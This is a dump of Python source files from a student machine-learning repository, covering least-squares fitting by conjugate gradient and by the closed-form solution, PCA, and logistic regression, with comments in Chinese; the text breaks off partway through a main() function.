"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8463,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 247,
"path": "/lab1/conjugate_gradient.py",
"repo_name": "1180300407/machine-learning",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nclass conjugate_gradient:\n '''\n 最小二乘法的共轭梯度解法,这里数据由[start,end]间的高斯函数随机生成\n '''\n def __init__(self, train_N=50, valid_N=50, test_N=50, order=6, start=0, end=1, eta=0.1):\n '''\n 构造函数\n train_N:训练数据的规模\n valid_N:验证数据的规模\n test_N :测试数据的规模\n order :模拟的多项式阶数\n start :生成数据的起点\n end :生成数据的终点\n eta :学习率\n '''\n #根据给定参数随机生成数据\n all_data = self.get_data(train_N, valid_N, test_N, order, start, end)\n self.train_data = all_data[0]\n self.train_x = all_data[1]\n self.train_label = all_data[2]\n self.valid_data = all_data[3]\n self.valid_x = all_data[4]\n self.valid_label = all_data[5]\n self.test_data = all_data[6]\n self.test_x = all_data[7]\n self.test_label = all_data[8]\n self.order = order\n self.eta = eta\n '''\n print('train_data:')\n print(self.train_data)\n print('valid_data:')\n print(self.valid_data)\n print('test_data:')\n print(self.test_data)\n '''\n \n def get_data(self, train_N, valid_N, test_N, order, start, end):\n '''\n 随机生成数据\n train_N:训练数据的规模\n valid_N:验证数据的规模\n test_N :测试数据的规模\n order :模拟的多项式阶数\n start :生成数据的起点\n end :生成数据的终点\n ''' \n \n #pi值\n pi = np.pi\n\n #添加的高斯噪声的均值与方差\n mu = 0\n sigma = 0.12\n X = np.ones((train_N, order+1))\n \n #生成x矩阵\n for i in range(train_N):\n for j in range(order+1):\n X[i][j] = np.power(start + i*(end-start)/train_N, j)\n\n #存储真实值列向量\n t = []\n #存储所取到的x值\n x = []\n\n #真实函数值&添加噪声\n for i in range(train_N):\n x.append(X[i][1])\n f_x = np.sin(2*pi*X[i][1])+random.gauss(mu, sigma) #在for循环中根据x值生成正弦函数值\n t.append(f_x) #加入到真实值列表中\n \n #转为列向量\n t = np.array(t) \n t = t.reshape(-1, 1)\n \n #验证数据集,用来确定超参数lamda\n validation_x = []\n validation_X = np.ones((valid_N, order+1))\n t_validation = []\n for i in range(valid_N):\n ran_num = random.randrange(0,100*valid_N)/(100*valid_N)\n while(ran_num in x):\n ran_num = random.randrange(0,100*valid_N)/(100*valid_N)\n validation_x.append(ran_num)\n\n validation_x.sort()\n for i in range(valid_N):\n for j in range(order+1):\n validation_X[i][j] = np.power(validation_x[i], j)\n t_validation.append(np.sin(2*pi*validation_x[i]))\n t_validation = np.array(t_validation)\n t_validation = t_validation.reshape(-1, 1)\n \n #测试数据集,评估模型效果\n test_x=[]\n t_test=[]\n test_X=np.ones((test_N, order+1))\n for i in range(test_N):\n ran_num = random.randrange(0,100*test_N)/(100*test_N)\n while(ran_num in x or ran_num in validation_x):\n ran_num = random.randrange(0,100*test_N)/(100*test_N)\n test_x.append(ran_num)\n \n test_x.sort()\n for i in range(test_N):\n for j in range(order+1):\n test_X[i][j] = np.power(test_x[i], j)\n t_test.append(np.sin(2*pi*test_x[i]))\n t_test = np.array(t_test)\n t_test = t_test.reshape(-1, 1)\n \n return (X, x, t, validation_X, validation_x, t_validation, test_X, test_x, t_test)\n\n def lossfunc(self, data, label, parameter, lamda):\n '''\n 损失函数(带有正则项)\n data :数据\n label :标签\n parameter :参数\n lamda :正则系数\n '''\n mat = np.dot(data, parameter) - label\n result_mat = np.dot(mat.T, mat) + 0.5*np.dot(parameter.T, parameter)*lamda\n return result_mat[0][0]\n \n def conjugate_reg_gradient(self):\n '''\n 共轭梯度法参数求解\n ''' \n #利用 (x^T*x)w=x^T*t 方程组的共轭梯度解法\n\n #令b=x^T*t\n #所求参数即为 Aw=b 中的解w\n b = np.dot(self.train_data.T, self.train_label)\n \n #正则项所用到的矩阵的对角线\n eye=[]\n #构造正则项所需的对角矩阵的对角线\n for i in range(self.order):\n if(i==0):\n eye.append(0)\n else:\n eye.append(1)\n eye.append(1)\n\n #正则项所需的对角矩阵\n reg_matrix=np.diag(eye)\n\n\n #正则项参数lamda,5种选择,从中挑选\n lamda_0 = 3e-7\n lamda = []\n for i in range(5):\n lamda.append(lamda_0*np.power(10, i))\n\n #存储在选取不同lamda情况下验证集上的最小二乘误差\n min_validation_loss = 1e7\n \n #遍历lamda的值,用验证集上的最小二乘误差确定最优的lamda取值\n for i in range(5):\n #对于每个lamda, 参数向量初始化为全0(列向量)\n w = [0]*(self.order+1)\n w = np.array(w)\n w = w.T\n w = w.reshape(self.order+1, 1)\n \n #加入正则项\n A = np.dot(self.train_data.T, self.train_data) + lamda[i]*reg_matrix\n \n #共轭梯度\n s = np.dot(A, w)\n #s = s.reshape(self.order+1, 1)\n #print('s:'+str(s.shape))\n r = b-s\n #print('r:'+str(r.shape))\n p = r\n #print('p:'+str(p.shape))\n for j in range(self.order+1):\n temp = np.dot(A, p)\n alpha = ((np.dot(r.T, p))/(np.dot(temp.T, p)))[0][0]\n '''\n print(alpha)\n print('w:' + str(w.shape))\n '''\n w = w + alpha*p\n '''\n print(w.shape)\n print(w)\n '''\n r = b - np.dot(A,w)\n if(not r.any()):\n break\n beta = (-1)*(r.T@temp)/(p.T@temp)\n p = r+beta*p\n \n #求出验证集上的损失函数值\n temp_validation_loss=self.lossfunc(self.valid_data, self.valid_label, w, lamda[i])\n \n #挑选最小损失值的超参数lamda\n if(temp_validation_loss < min_validation_loss):\n lamda_flag = i\n min_validation_loss = temp_validation_loss\n w_final = w\n \n #把每一个超参lamda对应的图像都画出来\n w = np.array(w)\n w = np.squeeze(w)\n w = w[::-1]\n func_reg = np.poly1d(w)\n valid_reg = func_reg(self.valid_x)\n plt.title('Valid data with Regular Item: order=%d , datasize=%d, lamda=%.8f' %(self.order , len(self.valid_x), lamda[i]))\n plt.scatter(self.valid_x, self.valid_label)\n plt.plot(self.valid_x, valid_reg)\n plt.xlabel('x')\n plt.ylabel('validation_reg(x)')\n plt.show()\n\n #打印出最终选取的lamda取值\n print('选取的lamda为: %.8f' %lamda[lamda_flag])\n\n test_loss=self.lossfunc(self.test_data, self.test_label, w_final, lamda[lamda_flag])\n print('加正则项模型的测试集误差为: %f' %test_loss)\n\n #用测试集数据评估模型效果,画图\n w_t = w_final.T\n w_t = np.array(w_t)\n w_t = np.squeeze(w_t)\n w_t = w_t[::-1]\n func_reg = np.poly1d(w_t)\n test_reg = func_reg(self.test_x)\n plt.title('Test data with Regular Item: order=%d , datasize=%d, lamda=%.8f' %(self.order, len(self.test_x), lamda[lamda_flag]))\n plt.scatter(self.test_x, self.test_label)\n plt.plot(self.test_x, test_reg)\n plt.xlabel('x')\n plt.ylabel('y_reg(x)')\n plt.show()\n\nif __name__ == '__main__':\n answer = conjugate_gradient()\n answer.conjugate_reg_gradient()\n\n"
},
{
"alpha_fraction": 0.5488572716712952,
"alphanum_fraction": 0.5591146349906921,
"avg_line_length": 27.20812225341797,
"blob_id": "b33c350e7b0d87eec62706a75ef07709cf9507ea",
"content_id": "bfcc773ee240ac9b85d5dd0158dc01d1f7ff7943",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6611,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 197,
"path": "/lab4/PCA.py",
"repo_name": "1180300407/machine-learning",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \n\nclass PCA_maxVariance:\n def __init__(self, data, data_size, dim, target_dim, data_flag=True):\n '''\n data :样本数据\n data_size :样本数据集的大小\n dim :样本数据的维度\n target_dim:将样本数据进行PCA降维的目标维度\n data_flag :标识数据是否采用自动生成的3D数据,默认为true,即采用\n '''\n self.data_size = data_size\n if data_flag:\n self.data = self.get_3Ddata()\n else:\n self.data = data\n self.dim = dim\n self.target_dim = target_dim\n\n\n #生成三维数据,且数据主要分布在低维空间中(2维)\n #Datasize:生成数据集的大小\n def get_3Ddata(self):\n #三个维度的均值\n mean = [1, 2, 2]\n #三个维度的方差,其中第一维度远小于其它维度,使数据主要分布在低维空间\n cov = [[10, 0, 0], [0, 10, 0], [0, 0, 0.0005]]\n #保存生成的数据\n data = []\n for index in range(self.data_size):\n data.append(np.random.multivariate_normal(mean, cov).tolist())\n \n return np.array(data)\n\n #计算样本数据的均值与向量与协方差矩阵\n def cal_meanAndcov(self):\n #样本的均值向量求解\n mean = []\n #计算第i个维度的均值\n for i in range(self.dim):\n sum_i = 0\n for j in range(self.data_size):\n sum_i += self.data[j][i]\n mean_i = float(sum_i) / self.data_size\n mean.append(mean_i)\n mean = np.array(mean)\n #1*dim的行向量\n mean = mean.reshape((1, self.dim))\n \n #将均值扩展为Datasize*dim的矩阵,来实现Data-mean矩阵减法\n mean_mat = np.tile(mean, (self.data_size, 1))\n Data_minus = self.data-mean_mat\n \n #协方差矩阵\n cov = 1.0 / self.data_size * np.dot(Data_minus.T, Data_minus)\n \n #返回均值与协方差\n return mean, cov\n\n #寻找value中的最大值对应的下标index\n #value :数据集\n #length:数据集的大小\n def getindex_maxvalue(self, value, length):\n max_id = 0\n max_value = value[0]\n for i in range(length):\n if(value[i] > max_value):\n max_id = i\n max_value = value[i]\n \n return max_id\n\n #对数据进行PCA降维\n def PCA(self):\n #得到样本的均值与协方差矩阵\n mean, cov = self.cal_meanAndcov()\n \n #求解协方差矩阵的特征值与特征向量\n character_value, character_vector = np.linalg.eig(cov)\n character_value = character_value.reshape((self.dim, 1))\n print(\"%d 个原始特征向量:\" %self.dim)\n print(character_vector)\n print(\"对应的特征值为:\")\n print(character_value)\n \n #保存降维后最终保留的特征向量\n retain_vector=[]\n \n #保存未保留的特征向量,用来最小化误差\n delete_vector=[]\n \n #根据特征值的大小,选取保留的特征向量(target_dim个较大的特征值对应的特征向量)\n for i in range(self.target_dim):\n index = self.getindex_maxvalue(character_value, len(character_value))\n retain_vector.append(character_vector[index])\n #将选取的特征值去除\n character_value = np.delete(character_value, index, axis=0)\n character_vector = np.delete(character_vector, index, axis=0)\n \n #未保留的特征向量\n delete_vector = character_vector\n \n #target_dim个保留的特征向量\n retain_vector = np.array(retain_vector)\n \n #dim-target_dim个未保留特征向量\n delete_vector = np.array(delete_vector)\n \n #求取每个数据点在每个特征向量下的投影(坐标值)\n Data_projection = np.dot(self.data, retain_vector.T)\n \n #为了最小化误差而加上的偏置\n bias = np.dot(mean, delete_vector.T)\n \n return Data_projection, bias, retain_vector, delete_vector\n \n #对投影后的二维数据进行画图展示\n #data_projection :待展示的2维数据\n def draw2D_PCAdata(self, data_projection):\n x=[]\n y=[]\n for i in range(self.data_size):\n x.append(data_projection[i][0])\n y.append(data_projection[i][1])\n plt.scatter(x, y, marker='o', c=\"blue\")\n plt.show()\n \n #对于3D数据进行画图展示,注意如果数据维度不为3,it will do nothing\n def draw3D_data(self, image_label):\n if self.dim != 3:\n return\n fig = plt.figure()\n ax = Axes3D(fig)\n x=self.data[:,0]\n y=self.data[:,1]\n z=self.data[:,2]\n ax.scatter(x,y,z,facecolor=\"r\", edgecolor=\"b\", label=image_label)\n ax.set_xlabel('X Label')\n ax.set_ylabel('Y Label')\n ax.set_zlabel('Z Label')\n \n ax.plot(x,y,'y+',zdir='z')\n plt.legend()\n plt.show()\n return \n\n #对pca降维后的数据进行重建\n #pca_data :降维后数据\n #retain_vector:pca保留的主成分\n #delete_vector:pca未保留的成分向量\n #bias :pca未保留成分向量的系数\n def rebulid(self, pca_data, retain_vector, delete_vector, bias):\n #数据集大小\n Datasize = pca_data.shape[0]\n #保存重建的数据\n Data_rebuild = np.dot(pca_data, retain_vector)\n #利用保存的bias偏差减小还原时的误差\n vector_bias = np.dot(bias, delete_vector)\n mat_bias = np.tile(vector_bias, (Datasize, 1))\n #重建\n Data_rebuild = Data_rebuild + mat_bias\n return Data_rebuild\n \ndef main():\n # 用于生成数据的测试\n dim = 3\n N = 50\n pca = PCA_maxVariance('', N, dim, dim-1)\n pca.draw3D_data('Origin Data')\n data_projection, bias_pca, vector_retain, vector_delete = pca.PCA()\n print(\"Retain vectors:\")\n print(vector_retain)\n print(\"Data_projection:\")\n print(data_projection)\n print(\"bias:\")\n print(bias_pca)\n\n pca.draw2D_PCAdata(data_projection)\n\n '''\n print('Origin Data:')\n print(pca.data)\n '''\n \n '''\n data_rebuild = pca.rebulid(data_projection, vector_retain, vector_delete, bias_pca)\n print('Rebuild Data:')\n print(data_rebuild)\n '''\n pca.draw3D_data('Rebuild Data')\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.49319979548454285,
"alphanum_fraction": 0.5046983361244202,
"avg_line_length": 30.231660842895508,
"blob_id": "999b70da02259f05f80f1310cddcb4fefa023535",
"content_id": "9fbcfc9bc87b74fadf42aa87bee006f6084262c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9122,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 259,
"path": "/lab1/analytical_solution.py",
"repo_name": "1180300407/machine-learning",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*- \n\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nclass analytical_solution:\n '''\n 最小二乘法的解析解解法,这里数据由[start,end]间的高斯函数随机生成\n '''\n def __init__(self, train_N=50, valid_N=50, test_N=50, order=6, start=0, end=1):\n '''\n 构造函数\n train_N:训练数据的规模\n valid_N:验证数据的规模\n test_N :测试数据的规模\n order :模拟的多项式阶数\n start :生成数据的起点\n end :生成数据的终点\n '''\n #根据给定参数随机生成数据\n all_data = self.get_data(train_N, valid_N, test_N, order, start, end)\n self.train_data = all_data[0]\n self.train_x = all_data[1]\n self.train_label = all_data[2]\n self.valid_data = all_data[3]\n self.valid_x = all_data[4]\n self.valid_label = all_data[5]\n self.test_data = all_data[6]\n self.test_x = all_data[7]\n self.test_label = all_data[8]\n self.order = order\n '''\n print('train_data:')\n print(self.train_data)\n print('valid_data:')\n print(self.valid_data)\n print('test_data:')\n print(self.test_data)\n '''\n \n def get_data(self, train_N, valid_N, test_N, order, start, end):\n '''\n 随机生成数据\n train_N:训练数据的规模\n valid_N:验证数据的规模\n test_N :测试数据的规模\n order :模拟的多项式阶数\n start :生成数据的起点\n end :生成数据的终点\n ''' \n \n #pi值\n pi = np.pi\n\n #添加的高斯噪声的均值与方差\n mu = 0\n sigma = 0.12\n X = np.ones((train_N, order+1))\n \n #生成x矩阵\n for i in range(train_N):\n for j in range(order+1):\n X[i][j] = np.power(start + i*(end-start)/train_N, j)\n\n #存储真实值列向量\n t = []\n #存储所取到的x值\n x = []\n\n #真实函数值&添加噪声\n for i in range(train_N):\n x.append(X[i][1])\n f_x = np.sin(2*pi*X[i][1])+random.gauss(mu, sigma) #在for循环中根据x值生成正弦函数值\n t.append(f_x) #加入到真实值列表中\n \n #转为列向量\n t = np.array(t) \n t = t.reshape(-1, 1)\n \n #验证数据集,用来确定超参数lamda\n validation_x = []\n validation_X = np.ones((valid_N, order+1))\n t_validation = []\n for i in range(valid_N):\n ran_num = random.randrange(0,100*valid_N)/(100*valid_N)\n while(ran_num in x):\n ran_num = random.randrange(0,100*valid_N)/(100*valid_N)\n validation_x.append(ran_num)\n\n validation_x.sort()\n for i in range(valid_N):\n for j in range(order+1):\n validation_X[i][j] = np.power(validation_x[i], j)\n t_validation.append(np.sin(2*pi*validation_x[i]))\n t_validation = np.array(t_validation)\n t_validation = t_validation.reshape(-1, 1)\n \n #测试数据集,评估模型效果\n test_x = []\n t_test = []\n test_X = np.ones((test_N, order+1))\n for i in range(test_N):\n ran_num = random.randrange(0,100*test_N)/(100*test_N)\n while(ran_num in x or ran_num in validation_x):\n ran_num = random.randrange(0,100*test_N)/(100*test_N)\n test_x.append(ran_num)\n \n test_x.sort()\n for i in range(test_N):\n for j in range(order+1):\n test_X[i][j] = np.power(test_x[i], j)\n t_test.append(np.sin(2*pi*test_x[i]))\n t_test = np.array(t_test)\n t_test = t_test.reshape(-1, 1)\n \n return (X, x, t, validation_X, validation_x, t_validation, test_X, test_x, t_test)\n \n def analytical_noregular(self):\n '''\n 不带正则项的解析法参数求解 \n '''\n \n #提取公因子进行加速\n #x^T*x\n q = np.dot(self.train_data.T, self.train_data)\n\n #无正则项的参数求解\n try:\n inverse_matrix = np.linalg.inv(q)\n w_nreg = np.dot(inverse_matrix, self.train_data.T)\n w_nreg = np.dot(w_nreg, self.train_label)\n print('无正则项的参数求解结果:')\n print(w_nreg) \n except:\n print(\"矩阵不可逆\")\n \n #画图\n w_nreg_t = w_nreg.T\n w_nreg_t = np.array(w_nreg_t)\n w_nreg_t = np.squeeze(w_nreg_t)\n w_nreg_t = w_nreg_t[::-1]\n func_nreg = np.poly1d(w_nreg_t)\n y_nreg = func_nreg(self.train_x)\n plt.title('Train data without Regular Item: order=%d , datasize=%d' %(self.order, len(self.train_x)))\n plt.scatter(self.train_x, self.train_label)\n plt.plot(self.train_x, y_nreg)\n plt.xlabel('x')\n plt.ylabel('y_nreg(x)')\n plt.show() \n \n test_loss = self.lossfunc(self.test_data, self.test_label, w_nreg)\n print('无正则项模型的测试集误差为: %f' %test_loss)\n test_nreg = func_nreg(self.test_x)\n #print('test_nreg:')\n #print(test_nreg)\n plt.title('Test data without Regular Item: order=%d , datasize=%d' %(self.order, len(self.test_x)))\n plt.scatter(self.test_x, self.test_label)\n plt.plot(self.test_x, test_nreg)\n plt.xlabel('x')\n plt.ylabel('y_nreg(x)')\n plt.show() \n\n def lossfunc(self, data, label, parameter):\n '''\n 损失函数\n data :数据\n label :标签\n parameter :参数\n '''\n mat = np.dot(data, parameter) - label\n return np.dot(mat.T, mat);\n \n def analytical_withregular(self):\n '''\n 带有正则项的解析法参数求解\n ''' \n #正则项所用到的矩阵的对角线\n eye = []\n #构造正则项所需的对角矩阵的对角线\n for i in range(self.order):\n if(i==0):\n eye.append(0)\n else:\n eye.append(1)\n eye.append(1)\n #正则项所需的对角矩阵\n reg_matrix = np.diag(eye) \n\n #正则项参数lamda,5种选择,从中挑选\n lamda_0 = 3e-7\n lamda=[]\n for i in range(5):\n lamda.append(lamda_0*np.power(10, i))\n\n #存储在选取不同lamda情况下验证集上的最小二乘误差\n min_validation_loss = 1e7\n \n #提取公因子进行加速\n #x^T*x\n q = np.dot(self.train_data.T, self.train_data)\n \n #遍历lamda的值,用验证集上的最小二乘误差确定最优的lamda取值\n for i in range(5):\n try:\n inverse_matrix = np.linalg.inv(q + lamda[i]*reg_matrix)\n w_reg = np.dot(inverse_matrix, self.train_data.T)\n w_reg = np.dot(w_reg, self.train_label)\n print('添加正则项的参数求解结果: lamda=%.8f' %lamda[i])\n print(w_reg)\n except:\n print(\"矩阵不可逆\")\n \n #求出验证集上的损失函数值\n temp_validation_loss=self.lossfunc(self.valid_data, self.valid_label, w_reg)\n \n #挑选最小损失值的超参数lamda\n if(temp_validation_loss < min_validation_loss):\n lamda_flag = i\n min_validation_loss = temp_validation_loss\n w = w_reg\n \n #把每一个超参lamda对应的图像都画出来\n w_reg = np.array(w_reg)\n w_reg = np.squeeze(w_reg)\n w_reg = w_reg[::-1]\n func_reg = np.poly1d(w_reg)\n valid_reg = func_reg(self.valid_x)\n plt.title('Valid data with Regular Item: order=%d , datasize=%d, lamda=%.8f' %(self.order , len(self.valid_x), lamda[i]))\n plt.scatter(self.valid_x, self.valid_label)\n plt.plot(self.valid_x, valid_reg)\n plt.xlabel('x')\n plt.ylabel('validation_reg(x)')\n plt.show()\n\n #打印出最终选取的lamda取值\n print('选取的lamda为: %.8f' %lamda[lamda_flag])\n\n test_loss=self.lossfunc(self.test_data, self.test_label, w)\n print('加正则项模型的测试集误差为: %f' %test_loss)\n\n #用测试集数据评估模型效果,画图\n w_t = w.T\n w_t = np.array(w_t)\n w_t = np.squeeze(w_t)\n w_t = w_t[::-1]\n func_reg = np.poly1d(w_t)\n test_reg = func_reg(self.test_x)\n plt.title('Test data with Regular Item: order=%d , datasize=%d, lamda=%.8f' %(self.order, len(self.test_x), lamda[lamda_flag]))\n plt.scatter(self.test_x, self.test_label)\n plt.plot(self.test_x, test_reg)\n plt.xlabel('x')\n plt.ylabel('y_reg(x)')\n plt.show()\n\nif __name__ == '__main__':\n answer = analytical_solution()\n answer.analytical_noregular()\n answer.analytical_withregular()"
},
{
"alpha_fraction": 0.5071922540664673,
"alphanum_fraction": 0.5368397831916809,
"avg_line_length": 30.406896591186523,
"blob_id": "2ca9bc887b3100286a32a28de409682aa33e0268",
"content_id": "b4c7ada13ec801d23acfada45207e0f3be978dea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10169,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 290,
"path": "/lab2/logistic_regression.py",
"repo_name": "1180300407/machine-learning",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass logistic_function:\n def __init__(self, train_N=150, test_N=150, dim=2, eta=0.1, lamda=0.03):\n '''\n 构造函数\n train_N:训练数据的规模\n valid_N:验证数据的规模\n test_N :测试数据的规模\n order :模拟的多项式阶数\n start :生成数据的起点\n end :生成数据的终点\n eta :学习率\n '''\n #根据给定参数随机生成数据\n self.dim = dim\n self.eta = eta\n self.lamda = lamda\n self.train_N = train_N\n self.test_N = test_N\n all_data = self.get_data(train_N, test_N)\n self.train_data = all_data[0]\n self.train_normaldata = all_data[1]\n self.train_label = all_data[2]\n self.test_data = all_data[3]\n self.test_label = all_data[4]\n \n #生成数据,为了便于展示,这里选择生成二维数据\n #train_N:训练数据规模\n #test_N :测试数据规模\n def get_data(self, train_N, test_N):\n #设定随机数种子\n np.random.seed(20711018)\n\n #手工设定模型的真实参数值\n theta_0 = 1\n theta_1 = 2\n theta_2 = 5\n\n #设定特征取值范围,为[-x_width,x_width]\n x_width = 6\n\n #每一维特征上的样本值(N*1列向量),用均匀分布生成\n #第0维为全1\n x0 = np.ones((train_N,1))\n\n #第一维取值范围为[-x_width,x_width]\n x1 = np.random.rand(train_N, 1)*x_width*2-x_width\n\n #改变随机种子,使得两个维度的特征独立同分布\n np.random.seed(213715360)\n #第二维取值范围为[-x_width,x_width]\n x2 = np.random.rand(train_N, 1)*x_width*2-x_width\n #测试不满足朴素贝叶斯情况的取值\n #x2=x1\n X = np.hstack((x0,x1,x2))\n min_x = x_width\n max_x = -x_width\n for i in range(train_N):\n for j in range(self.dim):\n if(X[i][j+1]<min_x):\n min_x = X[i][j+1]\n if(X[i][j+1]>max_x):\n max_x = X[i][j+1]\n coef = 1.0/(max_x-min_x)\n X_coef = coef*(X-min_x)\n\n #利用设定的真实参数值代入sigmoid函数,并加入噪声,得到标签\n t = self.sigmoid_function(theta_0*x0+theta_1*x1+theta_2*x2)+np.random.randn(train_N,1)*0.12\n t = np.round(t)\n\n\n #测试数据集\n #重新设定随机数种子\n np.random.seed(2720101960)\n #每一维特征上的样本值(N*1列向量),用均匀分布生成\n #第0维为全1\n x0_test = np.ones((test_N,1))\n \n #第一维取值范围为[-x_width,x_width]\n x1_test = np.random.rand(test_N,1)*x_width*2-x_width\n\n #改变随机种子,使得两个维度的特征独立同分布\n np.random.seed(2044460)\n #第二维取值范围为[-x_width,x_width]\n x2_test = np.random.rand(test_N,1)*x_width*2-x_width\n \n X_test = np.hstack((x0_test,x1_test,x2_test))\n\n #利用设定的真实参数值代入sigmoid函数,得到标签\n t_test = self.sigmoid_function(theta_0*x0_test+theta_1*x1_test+theta_2*x2_test)\n t_test = np.round(t_test)\n \n #样本真实情况\n plt.title('true labels' )\n self.draw(X, t, train_N)\n plt.plot(x1, x1*(-1)*theta_1/theta_2-theta_0/theta_2,'r')\n plt.ylim(-5,5)\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()\n \n return X, X_coef, t, X_test, t_test\n\n #sigmoid函数\n def sigmoid_function(self, z):\n func = 1.0+np.exp((-1)*z)\n return 1.0/func\n\n\n #预测函数\n #theta:模型参数,m*1列向量\n #a :样本数据,N*m矩阵\n def hypothesis_function(self, theta,a): \n mat = np.dot(a,theta)\n value = self.sigmoid_function(mat)\n return value\n\n #损失函数\n #theta :模型参数,m*1列向量\n #a :样本数据,N*m矩阵\n #c : 样本标签,N*1列向量\n #Datasize: 样本大小,N\n #J(theta)=[(-1)/Datasize]*[t^T*log(h(x))+(1-t^T)log(1-h(x))]\n def loss_function(self, a,theta,c,Datasize):\n value = 0\n h_0 = np.log(1-self.hypothesis_function(theta,a))\n h_1 = np.log(self.hypothesis_function(theta,a))\n value = np.dot(c.T,h_1)+np.dot(1-c.T,h_0)\n value = value*(-1)\n return value/Datasize\n\n #加惩罚项的损失函数\n #theta :模型参数,m*1列向量\n #a :样本数据,N*m矩阵\n #c : 样本标签,N*1列向量\n #Datasize: 样本大小,N\n #J(theta)=[(-1)/Datasize]*[t^T*log(h(x))+(1-t^T)log(1-h(x))]+0.5*lamda||theta||^2/Datasize\n def loss_function_reg(self,a,theta,c,Datasize,lam):\n value = self.loss_function(a,theta,c,Datasize)\n reg = 0.5*lam*theta.T@theta/Datasize\n return value+reg\n\n #梯度函数\n #theta :模型参数,m*1列向量\n #a :样本数据,N*m矩阵\n #c : 样本标签,N*1列向量\n #Datasize: 样本大小,N\n def gradient_function(self,theta,a,c,Datasize):\n #grad=X^T(h(X)-t)/Datasize\n value = np.array(self.hypothesis_function(theta,a))\n value = value.reshape(-1,1)\n grad = value-c\n grad = np.dot(a.T,grad)\n grad = grad/Datasize\n return grad\n\n #将两类点分别画出来\n #x : 样本数据\n #y : 样本标签\n #size: 样本大小\n def draw(self, x,y,size):\n c = ['b','g']\n x1_b = []\n x1_g = []\n x2_b = []\n x2_g = []\n for i in range(size):\n if(y[i]==0):\n x1_b.append(x[i][1])\n x2_b.append(x[i][2])\n else:\n x1_g.append(x[i][1])\n x2_g.append(x[i][2])\n plt.scatter(x1_b,x2_b,c=c[0])\n plt.scatter(x1_g,x2_g,c=c[1])\n \n #计算准确率\n def precision(self, y,t,size):\n count = 0\n for i in range(size):\n if(y[i]==t[i]):\n count += 1\n \n return (float(count))/size\n \n #不带正则项的logistic_regression分类\n def classify_noregular(self):\n alpha = self.eta\n x1 = self.train_data[:,1]\n x1_test = self.test_data[:,1]\n \n #无惩罚项\n theta_nreg = np.array([0]*(self.dim+1))\n theta_nreg = theta_nreg.T\n theta_nreg = theta_nreg.reshape(-1,1)\n\n loss0_nreg = 0\n loss1_nreg = self.loss_function(self.train_normaldata, theta_nreg, self.train_label, self.train_N)\n terminal = 1e-7\n\n while(abs(loss1_nreg-loss0_nreg)>terminal):\n theta_temp = theta_nreg-alpha*self.gradient_function(theta_nreg, self.train_normaldata, self.train_label, self.train_N)\n loss0_nreg = loss1_nreg\n loss1_nreg = self.loss_function(self.train_normaldata, theta_temp, self.train_label, self.train_N)\n if(loss1_nreg>loss0_nreg):\n alpha = alpha/2\n continue\n \n theta_nreg=theta_temp\n \n\n #模型学习情况\n plt.title('learning model without regular items' )\n self.draw(self.train_data, self.train_label, self.train_N)\n plt.plot(x1,x1*(-1)*theta_nreg[1]/theta_nreg[2]-theta_nreg[0]/theta_nreg[2],'r')\n plt.ylim(-5,5)\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()\n\n #用测试集测试\n plt.title('test without regular items' )\n self.draw(self.test_data, self.test_label, self.test_N)\n plt.plot(x1_test, x1_test*(-1)*theta_nreg[1]/theta_nreg[2]-theta_nreg[0]/theta_nreg[2], 'r')\n plt.ylim(-5,5)\n plt.xlabel('x1_test')\n plt.ylabel('x2_test')\n plt.show()\n y_nreg = self.hypothesis_function(theta_nreg, self.test_data)\n y_nreg = np.round(y_nreg)\n acc = self.precision(y_nreg, self.test_label, self.test_N)\n print('Precision without regular items: %f%%' %(100*acc))\n \n #带正则项的logistic_regression分类\n def classify_withregular(self):\n alpha = self.eta\n x1 = self.train_data[:,1]\n x1_test = self.test_data[:,1]\n #带惩罚项\n theta_reg = np.array([0]*(self.dim+1))\n theta_reg = theta_reg.T\n theta_reg = theta_reg.reshape(-1,1)\n\n loss0_reg = 0\n loss1_reg = self.loss_function_reg(self.train_normaldata, theta_reg, self.train_label, self.train_N, self.lamda)\n terminal = 1e-10\n\n while(abs(loss1_reg-loss0_reg)>terminal):\n theta_temp = theta_reg*(1-self.eta*self.lamda/self.train_N)-self.eta*self.gradient_function(theta_reg, self.train_normaldata, self.train_label, self.train_N)\n loss0_reg = loss1_reg\n loss1_reg = self.loss_function_reg(self.train_normaldata, theta_temp, self.train_label, self.train_N, self.lamda)\n if(loss1_reg>loss0_reg):\n alpha = alpha/2\n continue\n \n theta_reg=theta_temp\n \n #模型学习情况\n plt.title('learning model with regular items,lamda=%f' %self.lamda)\n self.draw(self.train_data, self.train_label, self.train_N)\n plt.plot(x1, x1*(-1)*theta_reg[1]/theta_reg[2]-theta_reg[0]/theta_reg[2],'r')\n plt.ylim(-5,5)\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()\n \n #用测试集测试\n plt.title('test with regular items,lamda=%f' %self.lamda)\n self.draw(self.test_data, self.test_label, self.test_N)\n plt.plot(x1_test,x1_test*(-1)*theta_reg[1]/theta_reg[2]-theta_reg[0]/theta_reg[2],'r')\n plt.ylim(-5,5)\n plt.xlabel('x1_test')\n plt.ylabel('x2_test')\n plt.show()\n y_reg = self.hypothesis_function(theta_reg, self.test_data)\n y_reg = np.round(y_reg)\n acc = self.precision(y_reg, self.test_label, self.test_N)\n print('Precision with regular items: %f%%' %(100*acc))\n \ndef main():\n lc = logistic_function()\n 